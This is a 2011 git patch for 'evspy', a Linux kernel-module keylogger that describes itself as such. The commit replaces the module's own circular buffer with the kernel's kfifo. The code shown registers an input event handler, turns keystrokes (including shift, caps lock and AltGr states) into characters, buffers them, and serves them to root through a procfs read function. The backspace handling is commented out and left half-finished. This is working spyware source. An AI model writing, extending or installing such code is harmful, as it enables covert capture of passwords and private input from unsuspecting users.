From 28974e52f86f8873d47a899cbb2e5b122d62bfc1 Mon Sep 17 00:00:00 2001
From: Guillermo Ramos
Date: Sat, 29 Oct 2011 21:37:52 +0200
Subject: First version of cbuf.c and cbuf.h Switching to standard kfifo.h
Linux circular buffer implementation
---
Makefile | 2 +-
cbuf.c | 55 +++++++++++++++++++++++++++++++++++++++++++++++++++++
cbuf.h | 36 +++++++++++++++++++++++++++++++++++
evspy-core.c | 62 +++++++++++++-----------------------------------------------
evspy-core.h | 59 +++++++--------------------------------------------------
5 files changed, 112 insertions(+), 102 deletions(-)
create mode 100644 cbuf.c
create mode 100644 cbuf.h
diff --git a/Makefile b/Makefile
index 573b77f..90f40ae 100644
--- a/Makefile
+++ b/Makefile
@@ -1,5 +1,5 @@
obj-m += evspy.o
-evspy-objs := kmap/kmap.o evspy-core.o
+evspy-objs := kmap/kmap.o evspy-core.o cbuf.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
diff --git a/cbuf.c b/cbuf.c
new file mode 100644
index 0000000..6447ae1
--- /dev/null
+++ b/cbuf.c
@@ -0,0 +1,55 @@
+/*
+ * evspy - event based keylogger (Linux module)
+ *
+ * Copyright (c) 2011 Guillermo Ramos <0xwille@gmail.com>
+ * based on evbug module by Vojtech Pavlik ((c) 1999-2001)
+ *
+ * This file is part of evspy
+ *
+ * evspy is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * evspy is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with evspy. If not, see .
+ */
+
+#include
+#include "cbuf.h"
+
+DECLARE_KFIFO(cbuffer, char, CBUF_SIZE);
+
+void cbuf_init(void)
+{
+ INIT_KFIFO(cbuffer);
+}
+
+int cbuf_read(char *to, int count, int *eof)
+{
+ int tmp = kfifo_len(&cbuffer);
+ unsigned int n = min(tmp, count); // TODO n = count?
+
+ n = kfifo_out(&cbuffer, to, n);
+
+ if (kfifo_is_empty(&cbuffer))
+ *eof = 1;
+
+ return n;
+}
+
+void cbuf_write(char c)
+{
+ /*
+ * The kfifo implementation doesn't allow to write in a full buffer, so if
+ * we want to do it anyway, we must first delete the last element
+ */
+ if (kfifo_is_full(&cbuffer))
+ kfifo_skip(&cbuffer);
+ kfifo_put(&cbuffer, &c);
+}
diff --git a/cbuf.h b/cbuf.h
new file mode 100644
index 0000000..a996cee
--- /dev/null
+++ b/cbuf.h
@@ -0,0 +1,36 @@
+/*
+ * evspy - event based keylogger (Linux module)
+ *
+ * Copyright (c) 2011 Guillermo Ramos <0xwille@gmail.com>
+ * based on evbug module by Vojtech Pavlik ((c) 1999-2001)
+ *
+ * This file is part of evspy
+ *
+ * evspy is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * evspy is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with evspy. If not, see .
+ */
+
+#ifndef _EVS_CBUF_H
+#define _EVS_CBUF_H
+
+
+#include
+
+#define CBUF_SIZE PAGE_SIZE // size of the circular buffer (4K)
+
+void cbuf_init(void);
+int cbuf_read(char *to, int count, int *eof);
+void cbuf_write(char c);
+
+
+#endif /* _EVS_CBUF_H */
diff --git a/evspy-core.c b/evspy-core.c
index b33fd27..58625a2 100644
--- a/evspy-core.c
+++ b/evspy-core.c
@@ -21,14 +21,11 @@
*/
#include "evspy-core.h"
+#include "cbuf.h"
-static char *buffer; // circular buffer
-static char *rdp; // read pointer
-static char *wrp; // write pointer
static unsigned short int capslock_on = 0;
static unsigned short int shift_on = 0;
-
#ifdef EVS_ALTGR_ENABLED
static unsigned short int altgr_on = 0;
#endif
@@ -39,10 +36,7 @@ static unsigned short int altgr_on = 0;
static int evspy_read_proc(char *page, char **start, off_t offset, int count,
int *eof, void *data)
{
- int n, toend;
- int retval = 0;
- int diff = wrp - rdp;
-
+ int n;
// root only plz
if (current_uid() || current_euid()) {
#if EVS_TROLL == 1
@@ -55,35 +49,7 @@ static int evspy_read_proc(char *page, char **start, off_t offset, int count,
#endif
}
- // wrp > rdp: read from rdp to wrp
- if (diff > 0) {
- n = min(diff, count);
- strncpy(page, rdp, n);
- rdp += n;
- retval = n;
-
- // rdp > wrp: read from rdp to end of buffer and then from the beginning of
- // the buffer to wrp
- } else if (diff < 0) {
- toend = (buffer + EVS_BUFSIZE) - rdp;
- n = min(toend, count);
- strncpy(page, rdp, n);
- retval = n;
-
- if (n < toend) {
- rdp += n;
- } else {
- n = min(wrp - buffer, count - retval);
- strncpy(page + retval, buffer, n);
- retval += n;
- rdp = buffer + n;
- }
- }
-
- // wrp == rdp: buffer is empty
- if (rdp == wrp)
- *eof = 1;
- return retval;
+ return cbuf_read(page, count, eof);
}
/*
@@ -173,7 +139,7 @@ static void special_char(unsigned int code, unsigned int value)
sp_tag[1] = '-';
while (*sp_tag)
- evs_insert(*sp_tag++);
+ cbuf_write(*sp_tag++);
}
static void evspy_event(struct input_handle *handle, unsigned int type,
@@ -183,10 +149,10 @@ static void evspy_event(struct input_handle *handle, unsigned int type,
if (type != EV_KEY || unlikely(value == EVS_VAL_HOLD)) {
return;
- // Backspace
- } else if (code == KEY_BACKSPACE && value == EVS_VAL_PRESS) {
- evs_backspace();
- return;
+// // Backspace
+// } else if (code == KEY_BACKSPACE && value == EVS_VAL_PRESS) {
+// evs_backspace();
+// return;
// Special/unknown keys (alt, ctrl, esc, shift, etc)
} else if (code >= sizeof(map) || (map[code] == '.' && likely(code != KEY_DOT))) {
@@ -196,13 +162,13 @@ static void evspy_event(struct input_handle *handle, unsigned int type,
} else if (value == EVS_VAL_PRESS) {
#ifdef EVS_ALTGR_ENABLED
if (altgr_on)
- evs_insert(evs_altgr(code));
+ cbuf_write(evs_altgr(code));
else
#endif
if (shift_on || capslock_on)
- evs_insert(evs_shift(code));
+ cbuf_write(evs_shift(code));
else
- evs_insert(map[code]);
+ cbuf_write(map[code]);
}
}
@@ -266,15 +232,13 @@ static int __init evspy_init(void)
#ifdef EVS_ALTGR_ENABLED
init_altgrmap();
#endif
- buffer = kmalloc(EVS_BUFSIZE, GFP_KERNEL);
- rdp = wrp = buffer;
- return !buffer || input_register_handler(&evspy_handler);
+ cbuf_init();
+ return input_register_handler(&evspy_handler);
}
static void __exit evspy_exit(void)
{
input_unregister_handler(&evspy_handler);
- kfree(buffer);
#ifdef EVS_ALTGR_ENABLED
exit_altgrmap();
#endif
diff --git a/evspy-core.h b/evspy-core.h
index dfc0b2e..e9727f4 100644
--- a/evspy-core.h
+++ b/evspy-core.h
@@ -51,62 +51,17 @@
#define is_ascii(c) (map[c] >= 'a' && map[c] <= 'z')
-/*
- * If pointer is at the end of buffer, put it at the beginning.
- * If not, simply add 1 to it.
- */
-#define evs_incp(p) \
-({ \
- if ((p) == &buffer[EVS_BUFSIZE-1]) \
- (p) = buffer; \
- else \
- (p)++; \
- (p); \
-})
-
-/*
- * Same as evs_incp but backwards
- */
-#define evs_decp(p) \
-({ \
- if ((p) == buffer) \
- (p) = &buffer[EVS_BUFSIZE-1]; \
- else \
- (p)--; \
- (p); \
-})
-
-/*
- * Insert character c where wrp is pointing and move it to the next char.
- * If rdp == wrp, increase rdp too.
- */
-#define evs_insert(c) \
-({ \
- *wrp = (c); \
- if (evs_incp(wrp) == rdp) \
- evs_incp(rdp); \
-})
-
-/*
- * Remove a character from the buffer
- */
-#define evs_delete() \
-({ \
- if (likely(wrp != rdp)) \
- evs_decp(wrp); \
-})
-
/*
* Try to delete the last char inserted. If it is a special key ("[KEY]"),
* insert "[<<]" instead
*/
-#define evs_backspace() \
-({ \
- if (*(wrp-1) != ']') \
- evs_delete(); \
- else \
- special_char(KEY_BACKSPACE, EVS_VAL_PRESS); \
-})
+//#define evs_backspace() \
+//({ \
+// if (*(wrp-1) != ']') \
+//
+// else \
+// special_char(KEY_BACKSPACE, EVS_VAL_PRESS); \
+//})
/*
* Is the c event code associated to any of the FX buttons?
--
cgit v1.2.3